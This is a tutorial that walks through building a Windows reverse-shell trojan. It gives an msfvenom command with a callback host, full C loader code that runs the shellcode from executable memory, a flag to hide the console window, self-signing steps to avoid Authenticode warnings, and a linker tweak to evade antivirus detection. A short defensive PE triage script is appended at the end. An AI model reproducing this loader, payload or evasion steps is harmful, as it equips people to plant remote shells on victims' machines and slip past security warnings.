Disclaimer:
The procedures (methods) provided in this series of articles may be offensive and are intended only for security research and teaching. If the information is used for any other purpose, the reader bears all legal and joint liability, and the laboratory bears none.
Things needed:
- Visual Studio
- Kali Linux
- Windows
Use Kali Linux to generate the shellcode with the command:
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.8.113 LPORT=4444 -f c
```
First, what is shellcode?
Shellcode is raw machine code, shown here as hexadecimal bytes, that the CPU executes directly in order to obtain a shell on the target host.
Shellcode is divided into remote and local types, depending on whether the attacker runs it locally or uses it to control a remote machine.
Edit the code:
```c
#include <Windows.h>

int main()
{
    // Raw x64 reverse-shell stage emitted by the msfvenom command above (bytes unchanged).
    const char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52""\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48""\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9""\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41""\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48""\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01""\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48""\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0""\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c""\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0""\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04""\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59""\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48""\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33""\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00""\x49\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x08\x71\x41\x54""\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c""\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff""\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2""\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48""\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99""\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63""\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57""\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44""\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6""\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff""\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5""\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff""\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48""\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13""\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";

    // Allocate a readable, writable and executable (RWX) region large enough for the payload.
    PVOID shellcode_exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    // Copy the shellcode bytes into the new region.
    RtlCopyMemory(shellcode_exec, shellcode, sizeof shellcode);

    // Start a thread at the region's first byte and wait until it exits.
    DWORD threadID;
    HANDLE Thread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);
    WaitForSingleObject(Thread, INFINITE);
    return 0;
}
```
Let's take a look at this code:
```c
VirtualAlloc(0, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)
```
We need to use the VirtualAlloc function of the Windows API to allocate memory. The syntax of this function is:
```c
LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);
```
Parameters:
- [in, optional] lpAddress: the starting address of the area to be allocated.
- [in] dwSize: the size of the area, in bytes.
- [in] flAllocationType: the type of memory allocation. The code uses MEM_COMMIT, which commits physical storage (from memory or the page file on disk) for the reserved pages, together with MEM_RESERVE, which reserves a range of the process's virtual address space without allocating any physical storage in memory or in the page file.
- [in] flProtect: the memory protection of the page region to be allocated. If the pages are being committed, any memory protection constant can be specified.
This function is mainly used to reserve, commit or change the state of a page region in the virtual address space of the calling process. The VirtualAllocEx function can likewise be used to allocate memory in the address space of another process.
Then we need to fill in the shellcode. Here we use RtlCopyMemory to copy the source memory block to the target memory block:
```c
RtlCopyMemory(shellcode_exec, shellcode, sizeof shellcode)
```
Next, we need to create a thread that executes in the virtual address space of the calling process, using the CreateThread function:
```c
DWORD threadID;
HANDLE Thread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);
```
Parameters:
- [in, optional] lpThreadAttributes: pointer to a SECURITY_ATTRIBUTES structure that determines whether the returned handle can be inherited by child processes.
- [in] dwStackSize: the initial size of the stack, in bytes.
- [in] lpStartAddress: pointer to the application-defined function to be executed by the thread.
- [in, optional] lpParameter: pointer to the variable to be passed to the thread.
- [in] dwCreationFlags: flags that control thread creation. In the code, 0 means the thread runs immediately after creation.
- [out, optional] lpThreadId: pointer to the variable that receives the thread identifier.
Then we use the WaitForSingleObject function to wait on the thread handle until the thread finishes. The complete statement is:
```c
DWORD threadID;
HANDLE Thread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);
WaitForSingleObject(Thread, INFINITE);
```
Compile and run to receive the session.
To hide the console window, add this line to the code:
```c
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
```
Windows and some browsers (such as IE and Firefox) use a technology called Authenticode, a digital code-signing scheme, to identify the software publisher and to check that the software has not been tampered with (for example by a virus). If your software is not signed with an Authenticode certificate, users receive the warning "The publisher could not be verified. Are you sure you want to run this software?" and many users will give up on the software for security reasons.
Enter the command:
```sh
makecert -r -pe -n "CN=Diy CA" -ss CA -sr CurrentUser -a sha256 -cy authority -sky signature -sv DIY.pvk DIY.cer
```
- -r: self-signed certificate.
- -pe: mark the generated private key as exportable.
- -n: the X.500 subject name of the certificate (here the CA that will issue the signing certificate).
- -ss: the certificate store name.
- -sr: the location of the certificate store.
- -a: the signature algorithm.
- -cy: the certificate type.
- -sky: the key type.
- -sv: the .pvk private key file; created if it does not exist.
Store the certificate with the command:
```sh
certutil -user -addstore Root DIY.cer
```
Use the CA certificate you just created to issue a code-signing certificate. Enter the command:
```sh
makecert -pe -n "CN=Diy Cert" -a sha256 -cy end -sky signature -ic DIY.cer -iv DIY.pvk -sv DiyCert.pvk DiyCert.cer
```
- -ic: the issuer's certificate file.
- -iv: the issuer's .pvk private key file.
- -sv: the subject's .pvk private key file; created if it does not exist.
Use the Pvk2Pfx tool to copy the public key and private key information contained in the .spc/.cer and .pvk files into a Personal Information Exchange (.pfx) file:
```sh
pvk2pfx -pvk DiyCert.pvk -spc DiyCert.cer -pfx DiyCert.pfx
```
- -pvk: the .pvk file.
- -spc: the name and extension of the certificate file; either .spc or .cer may be given.
- -pfx: the .pfx file to write.
Sign the Trojan executable:
```sh
signtool sign /v /f DiyCert.pfx /t http://timestamp.comodoca.com/authenticode x64/Debug/diy.exe
```
In the Visual C++ project's linker properties, removing the other dependencies from the linker options (especially kernel32.lib) makes some anti-malware engines stop flagging the generated executable as malicious. kernel32.lib is still linked after compilation, because the executable knows where to find the required API functions (kernel32.dll).
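As an added defensive example (not code from the original post), here is a header-only PE32+ triage script in Python that reports the two on-disk traces the build steps above leave behind: a GUI subsystem (the console-hiding linker option) and the presence of an Authenticode signature blob in the security data directory. The sample PE bytes are constructed inline, and `triage_pe` and `build_sample_pe` are names chosen here.

```python
import struct

# Layout constants from the PE/COFF specification.
IMAGE_SUBSYSTEM_WINDOWS_GUI = 2
IMAGE_SUBSYSTEM_WINDOWS_CUI = 3
IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # Authenticode signature blob is referenced here
PE32PLUS_MAGIC = 0x20B

def triage_pe(data: bytes) -> dict:
    """Report subsystem and signature facts for a PE32+ image (header-only parse)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4            # 20-byte COFF file header
    opt = coff + 20                # optional header follows it
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic != PE32PLUS_MAGIC:
        raise ValueError("only PE32+ (x64) images are handled here")
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    num_dirs = struct.unpack_from("<I", data, opt + 108)[0]
    sec_rva, sec_size = 0, 0
    if num_dirs > IMAGE_DIRECTORY_ENTRY_SECURITY:
        sec_rva, sec_size = struct.unpack_from("<II", data, opt + 112 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    return {
        "gui_subsystem": subsystem == IMAGE_SUBSYSTEM_WINDOWS_GUI,
        "console_subsystem": subsystem == IMAGE_SUBSYSTEM_WINDOWS_CUI,
        "has_authenticode_blob": sec_size > 0,
    }

def build_sample_pe(subsystem: int, signed: bool) -> bytes:
    """Constructed, non-runnable PE32+ header blob used only to exercise triage_pe."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x22)   # x64, 240-byte optional header
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC)
    struct.pack_into("<H", opt, 68, subsystem)
    struct.pack_into("<I", opt, 108, 16)                            # 16 data directories
    if signed:
        struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, 0x1000, 0x800)
    return dos + b"PE\0\0" + coff + bytes(opt)

if __name__ == "__main__":
    print(triage_pe(build_sample_pe(IMAGE_SUBSYSTEM_WINDOWS_GUI, True)))
    print(triage_pe(build_sample_pe(IMAGE_SUBSYSTEM_WINDOWS_CUI, False)))
```

A present signature blob only shows that someone signed the file; a chain that roots in a certificate installed into the user's own Root store, as in the steps above, is not evidence of publisher trust and should be checked against the machine's trusted roots.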